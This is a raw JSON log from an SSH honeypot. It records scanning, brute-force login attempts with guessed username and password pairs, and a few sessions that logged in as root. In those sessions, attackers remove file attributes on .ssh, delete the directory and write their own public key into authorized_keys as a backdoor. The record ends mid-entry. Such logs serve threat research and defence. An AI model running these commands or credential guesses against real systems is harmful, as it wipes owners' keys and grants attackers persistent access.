{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:36:27.602575Z","src_ip":"212.227.125.160","session":"c08fb43f744a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:36:27.877359Z","src_ip":"212.227.125.160","session":"c08fb43f744a"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52274,"dst_ip":"1.2.3.4","dst_port":22,"session":"01ae7d64166a","protocol":"ssh","message":"New connection: 217.72.205.35:52274 (1.2.3.4:22) [session: 01ae7d64166a]","sensor":"my-vps","timestamp":"2025-08-31T05:36:49.669759Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:36:49.670987Z","src_ip":"217.72.205.35","session":"01ae7d64166a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50158,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4710fc6d59b","protocol":"ssh","message":"New connection: 212.227.235.229:50158 (1.2.3.4:22) [session: d4710fc6d59b]","sensor":"my-vps","timestamp":"2025-08-31T05:36:50.861081Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40052,"dst_ip":"1.2.3.4","dst_port":22,"session":"54dd6644300a","protocol":"ssh","message":"New connection: 212.227.235.229:40052 (1.2.3.4:22) [session: 54dd6644300a]","sensor":"my-vps","timestamp":"2025-08-31T05:36:55.031005Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:36:55.844654Z","src_ip":"212.227.235.229","session":"54dd6644300a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:36:55.845534Z","src_ip":"212.227.235.229","session":"54dd6644300a"}
{"eventid":"cowrie.login.failed","username":"test1","password":"admin123","message":"login attempt [test1/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:37:01.370817Z","src_ip":"212.227.235.229","session":"54dd6644300a"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:37:03.310919Z","src_ip":"212.227.235.229","session":"54dd6644300a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:37:04.770675Z","src_ip":"212.227.235.229","session":"d4710fc6d59b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:37:04.927069Z","src_ip":"212.227.235.229","session":"d4710fc6d59b"}
{"eventid":"cowrie.session.connect","src_ip":"58.144.199.22","src_port":46352,"dst_ip":"1.2.3.4","dst_port":22,"session":"3531dfd8e637","protocol":"ssh","message":"New connection: 58.144.199.22:46352 (1.2.3.4:22) [session: 3531dfd8e637]","sensor":"my-vps","timestamp":"2025-08-31T05:37:11.643748Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:37:11.644785Z","src_ip":"58.144.199.22","session":"3531dfd8e637"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:37:11.816881Z","src_ip":"58.144.199.22","session":"3531dfd8e637"}
{"eventid":"cowrie.login.failed","username":"gabriele","password":"gabriele","message":"login attempt [gabriele/gabriele] failed","sensor":"my-vps","timestamp":"2025-08-31T05:37:12.552144Z","src_ip":"58.144.199.22","session":"3531dfd8e637"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"sonar","message":"login attempt [sonar/sonar] failed","sensor":"my-vps","timestamp":"2025-08-31T05:37:13.216546Z","src_ip":"212.227.125.160","session":"c08fb43f744a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58006,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac1270921c4d","protocol":"ssh","message":"New connection: 212.227.125.160:58006 (1.2.3.4:22) [session: ac1270921c4d]","sensor":"my-vps","timestamp":"2025-08-31T05:37:15.826951Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:37:16.410339Z","src_ip":"212.227.125.160","session":"ac1270921c4d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:37:16.411814Z","src_ip":"212.227.125.160","session":"ac1270921c4d"}
{"eventid":"cowrie.login.failed","username":"test1","password":"admin123","message":"login attempt [test1/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:37:18.342872Z","src_ip":"212.227.125.160","session":"ac1270921c4d"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":34330,"dst_ip":"1.2.3.4","dst_port":22,"session":"282a980175f6","protocol":"ssh","message":"New connection: 43.159.36.188:34330 (1.2.3.4:22) [session: 282a980175f6]","sensor":"my-vps","timestamp":"2025-08-31T05:37:19.437698Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:37:19.438602Z","src_ip":"43.159.36.188","session":"282a980175f6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:37:19.694716Z","src_ip":"43.159.36.188","session":"282a980175f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48104,"dst_ip":"1.2.3.4","dst_port":22,"session":"27d039a3375a","protocol":"ssh","message":"New connection: 212.227.125.160:48104 (1.2.3.4:22) [session: 27d039a3375a]","sensor":"my-vps","timestamp":"2025-08-31T05:37:19.768765Z"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:37:20.140545Z","src_ip":"212.227.125.160","session":"ac1270921c4d"}
{"eventid":"cowrie.login.success","username":"root","password":"!@QW34er","message":"login attempt [root/!@QW34er] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:37:20.759152Z","src_ip":"43.159.36.188","session":"282a980175f6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:37:21.287894Z","src_ip":"43.159.36.188","session":"282a980175f6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:37:21.288575Z","src_ip":"43.159.36.188","session":"282a980175f6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:37:21.289290Z","src_ip":"43.159.36.188","session":"282a980175f6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:37:21.546583Z","src_ip":"43.159.36.188","session":"282a980175f6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:37:22.522081Z","src_ip":"43.159.36.188","session":"282a980175f6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:37:22.522803Z","src_ip":"43.159.36.188","session":"282a980175f6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:37:22.782083Z","src_ip":"43.159.36.188","session":"282a980175f6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:37:22.783044Z","src_ip":"43.159.36.188","session":"282a980175f6"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":34332,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0ebe6446d0d","protocol":"ssh","message":"New connection: 43.159.36.188:34332 (1.2.3.4:22) [session: f0ebe6446d0d]","sensor":"my-vps","timestamp":"2025-08-31T05:37:23.031152Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:37:23.031813Z","src_ip":"43.159.36.188","session":"f0ebe6446d0d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:37:23.281920Z","src_ip":"43.159.36.188","session":"f0ebe6446d0d"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":58190,"dst_ip":"1.2.3.4","dst_port":22,"session":"11ee8337c54b","protocol":"ssh","message":"New connection: 170.64.166.123:58190 (1.2.3.4:22) [session: 11ee8337c54b]","sensor":"my-vps","timestamp":"2025-08-31T05:37:23.953693Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:37:23.954615Z","src_ip":"170.64.166.123","session":"11ee8337c54b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:37:24.229858Z","src_ip":"170.64.166.123","session":"11ee8337c54b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:37:24.321765Z","src_ip":"43.159.36.188","session":"f0ebe6446d0d"}
{"eventid":"cowrie.login.success","username":"root","password":"abcd.1234","message":"login attempt [root/abcd.1234] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:37:25.371684Z","src_ip":"170.64.166.123","session":"11ee8337c54b"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:37:25.573166Z","src_ip":"43.159.36.188","session":"f0ebe6446d0d"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":48524,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4223f5409ce","protocol":"ssh","message":"New connection: 43.159.36.188:48524 (1.2.3.4:22) [session: a4223f5409ce]","sensor":"my-vps","timestamp":"2025-08-31T05:37:25.832429Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:37:25.833275Z","src_ip":"43.159.36.188","session":"a4223f5409ce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:37:25.941618Z","src_ip":"170.64.166.123","session":"11ee8337c54b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:37:25.942445Z","src_ip":"170.64.166.123","session":"11ee8337c54b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:37:25.944009Z","src_ip":"170.64.166.123","session":"11ee8337c54b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sh